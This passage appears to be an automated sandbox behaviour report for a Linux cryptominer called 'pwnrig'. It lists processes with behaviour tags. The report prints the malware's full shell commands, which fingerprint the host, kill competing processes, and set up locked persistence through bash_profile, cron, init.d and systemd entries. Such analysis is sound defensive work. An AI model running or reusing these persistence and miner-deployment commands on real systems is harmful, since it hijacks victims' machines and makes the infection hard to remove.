\$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2550
-
/usr/bin/whoamiwhoami3⤵PID:2561
-
-
/bin/hostnamehostname3⤵PID:2562
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2563
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2579
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2581
-
-
/bin/psps -A "-ostat,ppid"3⤵
- Reads runtime system information
PID:2580
-
-
/usr/bin/idid -u3⤵PID:2583
-
-
/bin/grepgrep -v grep3⤵PID:2586
-
-
/bin/grepgrep /etc/cron3⤵PID:2585
-
-
/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2584
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:2588 -
/usr/bin/idid -u3⤵PID:2589
-
-
/usr/bin/idid -u3⤵PID:2590
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:2591
-
-
/bin/rmrm -rf /bin/bprofr3⤵PID:2592
-
-
/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:2593
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:2594
-
-
/usr/bin/idid -u3⤵PID:2595
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:2596
-
-
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:2597
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2598
-
-
/bin/rmrm -rf /bin/crondr3⤵PID:2599
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:2600
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2602
-
-
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2603
-
-
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2604
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2605
-
-
/usr/bin/whichwhich chkconfig3⤵PID:2606
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:2607
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:2608
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:2609 -
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2610
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2610
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2610
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2610
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2610
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2610
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:2631
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2632
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2632
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2632
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2632
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2632
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2632
-
-
-
/bin/rmrm -rf /bin/initdr3⤵PID:2653
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:2654
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:2656
-
-
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:2657
-
-
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:2658
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:2659
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2660
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2660
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2660
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2660
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2660
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2660
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:2681
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2682
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2682
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2682
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2682
-
-
/sbin/systemctlsystemctl daemon-reload4⤵PID:2682
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2682
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
PID:2703
-
-
/usr/bin/whichwhich systemctl3⤵PID:2704
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
PID:2705
-
-
/bin/rmrm -rf /bin/sysdr3⤵PID:2706
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:2707
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:2709
-
-
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵PID:2710
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2711
-
-
/bin/systemctlsystemctl enable pwnrige.service3⤵PID:2712
-
-
/bin/systemctlsystemctl enable pwnrigl.service3⤵PID:2733
-
-
/bin/systemctlsystemctl daemon-reload3⤵PID:2754
-
-
/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵PID:2775
-
-
-
/bin/hostnamehostname -I1⤵PID:2553
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2555
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2560
-
/usr/bin/headhead -n 11⤵PID:2559
-
/bin/grepgrep "Port "1⤵PID:2558
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:2557
-
/bin/sedsed -e "s/\$//"1⤵PID:2569
-
/bin/sedsed -e "s/^ *//"1⤵PID:2568
-
/usr/bin/cutcut -d: -f21⤵PID:2567
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2566
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2572
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2575
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2578
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2817 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2841
-
/usr/bin/whoamiwhoami3⤵PID:2852
-
-
/bin/hostnamehostname3⤵PID:2853
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:2854
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2870
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2872
-
-
/bin/psps -A "-ostat,ppid"3⤵PID:2871
-
-
/usr/bin/idid -u3⤵PID:2874
-
-
/bin/grepgrep -v grep3⤵PID:2877
-
-
/bin/grepgrep /etc/cron3⤵PID:2876
-
-
/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2875
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2879
-
/usr/bin/idid -u3⤵PID:2880
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:2885
-
-
/bin/grepgrep -v /usr/sbin/httpd3⤵PID:2884
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:2883
-
-
/bin/grepgrep -v grep3⤵PID:2882
-
-
/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2881
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:2887
-
/usr/bin/idid -u3⤵PID:2888
-
-
-
/bin/hostnamehostname -I1⤵PID:2844
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2846
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2851
-
/usr/bin/headhead -n 11⤵PID:2850
-
/bin/grepgrep "Port "1⤵PID:2849
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:2848
-
/bin/sedsed -e "s/\$//"1⤵PID:2860
-
/bin/sedsed -e "s/^ *//"1⤵PID:2859
-
/usr/bin/cutcut -d: -f21⤵PID:2858
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2857
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2863
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2866
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2869
-
/usr/bin/wcwc -l1⤵PID:2894
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2892
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2893
-
/bin/grepgrep -v grep1⤵PID:2891
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2890
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:2895
-
/bin/hostnamehostname -I1⤵PID:2923
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2925
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2930
-
/usr/bin/headhead -n 11⤵PID:2929
-
/bin/grepgrep "Port "1⤵PID:2928
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:2927
-
/bin/sedsed -e "s/\$//"1⤵PID:2939
-
/usr/bin/cutcut -d: -f21⤵PID:2937
-
/bin/sedsed -e "s/^ *//"1⤵PID:2938
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:2936
-
/usr/bin/awkawk "{print \$1}"1⤵PID:2942
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2945
-
/usr/bin/awkawk "{print \$4}"1⤵PID:2948
-
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:3214
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3216
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3221
-
/usr/bin/headhead -n 11⤵PID:3220
-
/bin/grepgrep "Port "1⤵PID:3219
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:3218
-
/bin/sedsed -e "s/\$//"1⤵PID:3230
-
/bin/sedsed -e "s/^ *//"1⤵PID:3229
-
/usr/bin/cutcut -d: -f21⤵PID:3228
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3227
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3233
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3236
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3239
-
/usr/bin/wcwc -l1⤵PID:3264
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3263
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3262
-
/bin/grepgrep -v grep1⤵PID:3261
-
/bin/psps aux1⤵
- Reads CPU attributes
PID:3260
-
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:3297
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3299
-
/bin/grepgrep "Port "1⤵PID:3302
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:3301
-
/usr/bin/headhead -n 11⤵PID:3303
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3304
-
/bin/sedsed -e "s/\$//"1⤵PID:3313
-
/bin/sedsed -e "s/^ *//"1⤵PID:3312
-
/usr/bin/cutcut -d: -f21⤵PID:3311
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3310
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3316
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3319
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3322
-
/bin/hostnamehostname -I1⤵PID:3588
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3592
-
/bin/catcat /etc/ssh/sshd_config1⤵PID:3594
-
/bin/grepgrep "Port "1⤵PID:3595
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3597
-
/usr/bin/headhead -n 11⤵PID:3596
-
/bin/sedsed -e "s/\$//"1⤵PID:3606
-
/usr/bin/cutcut -d: -f21⤵PID:3604
-
/bin/sedsed -e "s/^ *//"1⤵PID:3605
-
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3603
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3609
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3612
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3615
-
/usr/bin/wcwc -l1⤵PID:3640
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3638
-
/bin/grepgrep -v grep1⤵PID:3637
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3639
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
PID:3636
-
/usr/bin/crontabcrontab -r1⤵PID:3642
-
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
PID:3643
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
PID:3644
-
/bin/bashbash -c "echo \"* * * * * /var/tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:3645
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:3647
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:3648
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:3649
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:3650
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:3651
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:3652
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3653
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:3654
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:3655
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:3656
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
- Attempts to change immutable files
PID:3657
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:3658
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:3659
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:3660
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:3661
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3662
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3663 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:3664
-
/usr/bin/whoamiwhoami3⤵PID:3675
-
-
/bin/hostnamehostname3⤵PID:3676
-
-
